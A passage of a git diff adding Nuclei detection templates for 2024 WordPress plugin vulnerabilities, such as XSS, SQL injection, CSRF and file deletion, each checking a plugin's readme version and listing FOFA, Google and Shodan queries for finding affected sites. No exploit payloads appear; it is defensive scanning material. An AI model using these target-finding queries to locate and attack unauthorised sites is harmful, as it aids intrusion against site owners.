https://www.wordfence.com/threat-intel/vulnerabilities/id/9a6b05b1-c649-4b72-b884-11fb83ec77f2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L + cvss-score: 6.5 + cve-id: CVE-2024-7032 + metadata: + fofa-query: "wp-content/plugins/clover-online-orders/" + google-query: inurl:"/wp-content/plugins/clover-online-orders/" + shodan-query: 'vuln:CVE-2024-7032' + tags: cve,wordpress,wp-plugin,clover-online-orders,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clover-online-orders" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7313-b762e54f8085d18804da0898542a5ec1.yaml b/poc/cve/CVE-2024-7313-b762e54f8085d18804da0898542a5ec1.yaml new file mode 100644 index 0000000000..ed85745b6f --- /dev/null +++ b/poc/cve/CVE-2024-7313-b762e54f8085d18804da0898542a5ec1.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7313-b762e54f8085d18804da0898542a5ec1 + +info: + name: > + Shield Security – Smart Bot Blocking & Intrusion Prevention Security <= 20.0.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Shield Security – Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'nav_sub' parameter in all versions up to, and including, 20.0.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f23e7274-45f6-46da-b4c8-2eaa1bd39257?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-7313 + metadata: + fofa-query: "wp-content/plugins/wp-simple-firewall/" + google-query: inurl:"/wp-content/plugins/wp-simple-firewall/" + shodan-query: 'vuln:CVE-2024-7313' + tags: cve,wordpress,wp-plugin,wp-simple-firewall,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-simple-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-simple-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 20.0.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7418-c9bdaa080236ee0e574742a6ecd2aa08.yaml b/poc/cve/CVE-2024-7418-c9bdaa080236ee0e574742a6ecd2aa08.yaml new file mode 100644 index 0000000000..3d806c163f --- /dev/null +++ b/poc/cve/CVE-2024-7418-c9bdaa080236ee0e574742a6ecd2aa08.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7418-c9bdaa080236ee0e574742a6ecd2aa08 + +info: + name: > + The Post Grid <= 7.7.11 - Authenticated (Contributor+) Information Disclosure + author: topscoder + severity: low + description: > + The The Post Grid – Shortcode, Gutenberg Blocks and Elementor Addon for Post Grid plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.7.11 via the post_query_guten and post_query functions. This makes it possible for authenticated attackers, with contributor-level access and above, to extract information from posts that are not public (i.e. draft, future, etc..). + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dddecb2e-9ad6-4e44-afce-5eba7da6322d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7418 + metadata: + fofa-query: "wp-content/plugins/the-post-grid/" + google-query: inurl:"/wp-content/plugins/the-post-grid/" + shodan-query: 'vuln:CVE-2024-7418' + tags: cve,wordpress,wp-plugin,the-post-grid,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/the-post-grid/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "the-post-grid" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.7.11') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7447.yaml b/poc/cve/CVE-2024-7447.yaml new file mode 100644 index 0000000000..c884287fb6 --- /dev/null +++ b/poc/cve/CVE-2024-7447.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7447 + +info: + name: > + Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free <= 3.7.3.2 - Missing Authorization to Unauthenticated Arbitrary Media Upload + author: topscoder + severity: high + description: > + The Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'fnsf_af2_handel_file_upload' function in all versions up to, and including, 3.7.3.2. This makes it possible for unauthenticated attackers to upload arbitrary media to the site, even if no forms exist. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9871f683-136e-45b5-90fb-a373a771014b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-7447 + metadata: + fofa-query: "wp-content/plugins/funnelforms-free/" + google-query: inurl:"/wp-content/plugins/funnelforms-free/" + shodan-query: 'vuln:CVE-2024-7447' + tags: cve,wordpress,wp-plugin,funnelforms-free,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/funnelforms-free/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "funnelforms-free" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7.3.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7573.yaml b/poc/cve/CVE-2024-7573.yaml new file mode 100644 index 0000000000..b3516395a6 --- /dev/null +++ b/poc/cve/CVE-2024-7573.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7573 + +info: + name: > + Relevanssi Live Ajax Search <= 2.4 - Unauthenticated WP_Query Argument Injection + author: topscoder + severity: medium + description: > + The Relevanssi Live Ajax Search plugin for WordPress is vulnerable to argument injection in all versions up to, and including, 2.4. This is due to insufficient validation of input supplied via POST data in the 'search' function. This makes it possible for unauthenticated attackers to inject arbitrary arguments into a WP_Query query and potentially expose sensitive information such as attachments or private posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bbcb648a-4a3e-4645-bd62-4415b1cf6516?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-7573 + metadata: + fofa-query: "wp-content/plugins/relevanssi-live-ajax-search/" + google-query: inurl:"/wp-content/plugins/relevanssi-live-ajax-search/" + shodan-query: 'vuln:CVE-2024-7573' + tags: cve,wordpress,wp-plugin,relevanssi-live-ajax-search,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/relevanssi-live-ajax-search/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "relevanssi-live-ajax-search" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7606-06ad2ab98249fa61f169a794d53b3d8d.yaml b/poc/cve/CVE-2024-7606-06ad2ab98249fa61f169a794d53b3d8d.yaml new file mode 100644 index 0000000000..4ed7b3b90c --- /dev/null +++ b/poc/cve/CVE-2024-7606-06ad2ab98249fa61f169a794d53b3d8d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7606-06ad2ab98249fa61f169a794d53b3d8d + +info: + name: > + Front End Users <= 3.2.28 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode + author: topscoder + severity: low + description: > + The Front End Users plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'user-search' shortcode in all versions up to, and including, 3.2.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/048ea84c-0d53-434b-ae49-d804ec1de8c4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-7606 + metadata: + fofa-query: "wp-content/plugins/front-end-only-users/" + google-query: inurl:"/wp-content/plugins/front-end-only-users/" + shodan-query: 'vuln:CVE-2024-7606' + tags: cve,wordpress,wp-plugin,front-end-only-users,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/front-end-only-users/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "front-end-only-users" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.28') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7607-4e7f3690990262b436b42cdf215f4676.yaml b/poc/cve/CVE-2024-7607-4e7f3690990262b436b42cdf215f4676.yaml new file mode 100644 index 0000000000..697dfd63c1 --- /dev/null +++ b/poc/cve/CVE-2024-7607-4e7f3690990262b436b42cdf215f4676.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7607-4e7f3690990262b436b42cdf215f4676 + +info: + name: > + Front End Users <= 3.2.28 - Authenticated (Contributor+) Time-Based SQL Injection + author: topscoder + severity: low + description: > + The Front End Users plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order’ parameter in all versions up to, and including, 3.2.28 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec162cdc-d4cd-47d9-b941-24bfee6c48fd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7607 + metadata: + fofa-query: "wp-content/plugins/front-end-only-users/" + google-query: inurl:"/wp-content/plugins/front-end-only-users/" + shodan-query: 'vuln:CVE-2024-7607' + tags: cve,wordpress,wp-plugin,front-end-only-users,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/front-end-only-users/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "front-end-only-users" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.28') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml b/poc/cve/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml new file mode 100644 index 0000000000..1d4ab91acf --- /dev/null +++ b/poc/cve/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf + +info: + name: > + MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar <= 5.7.0.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Deletion + author: topscoder + severity: low + description: > + The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to unauthorized arbitrary file deletion due to a missing capability check on the removeTempFiles() function and insufficient path validation on the 'file' parameter in all versions up to, and including, 5.7.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files which can make remote code execution possible when wp-config.php is deleted. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/43adc9dd-1780-440f-90c2-ff05a22eb084?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2024-7856 + metadata: + fofa-query: "wp-content/plugins/mp3-music-player-by-sonaar/" + google-query: inurl:"/wp-content/plugins/mp3-music-player-by-sonaar/" + shodan-query: 'vuln:CVE-2024-7856' + tags: cve,wordpress,wp-plugin,mp3-music-player-by-sonaar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mp3-music-player-by-sonaar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mp3-music-player-by-sonaar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.7.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7857-a18aa7c9dff5c4191bbf30ebf29a07a1.yaml b/poc/cve/CVE-2024-7857-a18aa7c9dff5c4191bbf30ebf29a07a1.yaml new file mode 100644 index 0000000000..0d0661d5c9 --- /dev/null +++ b/poc/cve/CVE-2024-7857-a18aa7c9dff5c4191bbf30ebf29a07a1.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7857-a18aa7c9dff5c4191bbf30ebf29a07a1 + +info: + name: > + Media Library Folders <= 8.2.2 - Authenticated (Subscriber+) Second-Order SQL Injection + author: topscoder + severity: low + description: > + The Media Library Folders plugin for WordPress is vulnerable to second order SQL Injection via the 'sort_type' parameter of the 'mlf_change_sort_type' AJAX action in all versions up to, and including, 8.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d2266254-9281-4859-8630-f7bb5c0ead19?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-7857 + metadata: + fofa-query: "wp-content/plugins/media-library-plus/" + google-query: inurl:"/wp-content/plugins/media-library-plus/" + shodan-query: 'vuln:CVE-2024-7857' + tags: cve,wordpress,wp-plugin,media-library-plus,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/media-library-plus/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "media-library-plus" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7863.yaml b/poc/cve/CVE-2024-7863.yaml new file mode 100644 index 0000000000..400de8ae0d --- /dev/null +++ b/poc/cve/CVE-2024-7863.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7863 + +info: + name: > + Favicon Generator <= 1.5 - Cross-Site Request Forgery to Arbitrary File Upload + author: topscoder + severity: medium + description: > + The Favicon Generator plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the output_sub_admin_page_0 function. This makes it possible for unauthenticated attackers to upload arbitrary files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The plugin author deleted the functionality of the plugin to patch this issue and close the plugin, we recommend seeking an alternative to this plugin. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9df24b5e-109e-43ae-b55b-8514281a631f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7863 + metadata: + fofa-query: "wp-content/plugins/favicon-generator/" + google-query: inurl:"/wp-content/plugins/favicon-generator/" + shodan-query: 'vuln:CVE-2024-7863' + tags: cve,wordpress,wp-plugin,favicon-generator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/favicon-generator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "favicon-generator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7895-ac1e11d6be8490c8494a930a375e9a8e.yaml b/poc/cve/CVE-2024-7895-ac1e11d6be8490c8494a930a375e9a8e.yaml new file mode 100644 index 0000000000..6754f49986 --- /dev/null +++ b/poc/cve/CVE-2024-7895-ac1e11d6be8490c8494a930a375e9a8e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7895-ac1e11d6be8490c8494a930a375e9a8e + +info: + name: > + Beaver Builder (Lite Version) <= 2.8.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via type Parameter + author: topscoder + severity: low + description: > + The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘type’ parameter in all versions up to, and including, 2.8.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f83db067-843f-4dd8-b5d1-83e95c6c88cc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-7895 + metadata: + fofa-query: "wp-content/plugins/beaver-builder-lite-version/" + google-query: inurl:"/wp-content/plugins/beaver-builder-lite-version/" + shodan-query: 'vuln:CVE-2024-7895' + tags: cve,wordpress,wp-plugin,beaver-builder-lite-version,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/beaver-builder-lite-version/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "beaver-builder-lite-version" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.3.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8030.yaml b/poc/cve/CVE-2024-8030.yaml new file mode 100644 index 0000000000..cfc81b9b28 --- /dev/null +++ b/poc/cve/CVE-2024-8030.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8030 + +info: + name: > + Ultimate Store Kit Elementor Addons, Woocommerce Builder, EDD Builder, Elementor Store Builder, Product Grid, Product Table, Woocommerce Slider <= 2.0.3 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The Ultimate Store Kit Elementor Addons, Woocommerce Builder, EDD Builder, Elementor Store Builder, Product Grid, Product Table, Woocommerce Slider plugin is vulnerable to PHP Object Injection via deserialization of untrusted input via the _ultimate_store_kit_wishlist cookie in versions up to , and including, 2.0.3. This makes it possible for an unauthenticated attacker to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker or above to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ef566dca-91ed-4929-b36b-4e424e07e1d4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-8030 + metadata: + fofa-query: "wp-content/plugins/ultimate-store-kit/" + google-query: inurl:"/wp-content/plugins/ultimate-store-kit/" + shodan-query: 'vuln:CVE-2024-8030' + tags: cve,wordpress,wp-plugin,ultimate-store-kit,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-store-kit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ultimate-store-kit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8043-613641adfae0294950a0fa915c4316f4.yaml b/poc/cve/CVE-2024-8043-613641adfae0294950a0fa915c4316f4.yaml new file mode 100644 index 0000000000..c0b554b2dc --- /dev/null +++ b/poc/cve/CVE-2024-8043-613641adfae0294950a0fa915c4316f4.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8043-613641adfae0294950a0fa915c4316f4 + +info: + name: > + Vikinghammer Tweet <= 0.2.4 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Vikinghammer Tweet plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.2.4. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d0598341-0088-42bf-9a34-794c941a848d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8043 + metadata: + fofa-query: "wp-content/plugins/vikinghammer-tweet/" + google-query: inurl:"/wp-content/plugins/vikinghammer-tweet/" + shodan-query: 'vuln:CVE-2024-8043' + tags: cve,wordpress,wp-plugin,vikinghammer-tweet,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/vikinghammer-tweet/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "vikinghammer-tweet" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.2.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml b/poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml new file mode 100644 index 0000000000..a081b7443f --- /dev/null +++ b/poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b + +info: + name: > + infolinks Ad Wrap <= 1.0.2 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + The infolinks Ad Wrap plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1ee41498-f5c6-48c3-a0db-55a1fe6e7f92?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8044 + metadata: + fofa-query: "wp-content/plugins/infolinks-ad-wrap/" + google-query: inurl:"/wp-content/plugins/infolinks-ad-wrap/" + shodan-query: 'vuln:CVE-2024-8044' + tags: cve,wordpress,wp-plugin,infolinks-ad-wrap,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/infolinks-ad-wrap/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "infolinks-ad-wrap" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8047-f6817d306b4651cd60631b6b036a3959.yaml b/poc/cve/CVE-2024-8047-f6817d306b4651cd60631b6b036a3959.yaml new file mode 100644 index 0000000000..8704e29546 --- /dev/null +++ b/poc/cve/CVE-2024-8047-f6817d306b4651cd60631b6b036a3959.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8047-f6817d306b4651cd60631b6b036a3959 + +info: + name: > + Visual Sound (old) <= 1.06 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + The Visual Sound (old) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.06. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3595f1c7-22a5-46c6-b81f-fe616a71116f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8047 + metadata: + fofa-query: "wp-content/plugins/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams/" + google-query: inurl:"/wp-content/plugins/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams/" + shodan-query: 'vuln:CVE-2024-8047' + tags: cve,wordpress,wp-plugin,visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.06') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml b/poc/cve/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml new file mode 100644 index 0000000000..6acd3dbd1f --- /dev/null +++ b/poc/cve/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab + +info: + name: > + Special Feed Items <= 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Special Feed Items plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - 